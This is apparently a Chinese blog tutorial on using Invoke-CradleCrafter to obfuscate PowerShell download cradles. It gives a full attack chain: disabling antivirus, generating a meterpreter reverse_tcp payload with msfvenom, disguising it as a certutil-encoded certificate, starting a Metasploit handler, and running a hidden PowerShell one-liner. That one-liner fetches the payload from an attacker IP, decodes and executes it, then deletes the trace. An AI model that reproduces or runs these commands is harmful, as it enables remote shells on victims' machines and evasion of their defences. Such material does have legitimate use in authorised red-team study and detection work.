Invoke-CradleCrafter
文章目录
- 介绍
- 下载安装
- 使用
介绍
Invoke-CradleCrafter是一个基于windows PowerShell远程下载的生成器和混淆器
下载安装
下载
https://github.com/danielbohannon/Invoke-CradleCrafter
安装
设置运行其他脚本的权限,然后安装Invoke-CradleCrafter,要把杀毒软件关了,否则会报错
Set-ExecutionPolicy BypassImport-Module ./Invoke-CradleCrafter.psd1
使用
第一步
使用msfvenom生成payload,
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.125.130 lport=8888 -e cmd/powershell_base64 -f psh -o payload.txt
然后在payload.txt目录下启动一个web服务,服务器ip为192.168.125.130,即链接为http://192.168.125.130/payload.txt
第二步
使用如下命令启动Invoke-CradleCrafter:
Invoke-CradleCrafter
先后执行如下命令,生成混淆payload
set URL http://192.168.125.130/payload.txt
MEMORY
CERTUTIL
ALL
1
将Result:中的内容保存为cert.txt,如用如下命令进行生成伪证书
certutil -encode cert.txt cert.cer
将cert.cer也放在web目录下
第三步
使用msfconsole开启监听
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.125.130
set lport 8888
exploit -j -z
第四步
利用
powershell.exe -Win hiddeN -Exec ByPasS add-content -path %APPDATA%/cert.cer (New-Object Net.WebClient).DownloadString('http://192.168.125.130/cert.cer'); certutil -decode %APPDATA%/cert.cer %APPDATA%/stage.ps1 & start /b cmd /c powershell.exe -Exec Bypass -NoExit -File %APPDATA%/stage.ps1 & start /b cmd /c del %APPDATA%/cert.cer
本文来自互联网用户投稿,文章观点仅代表作者本人,不代表本站立场,不承担相关法律责任。如若转载,请注明出处。 如若内容造成侵权/违法违规/事实不符,请点击【内容举报】进行投诉反馈!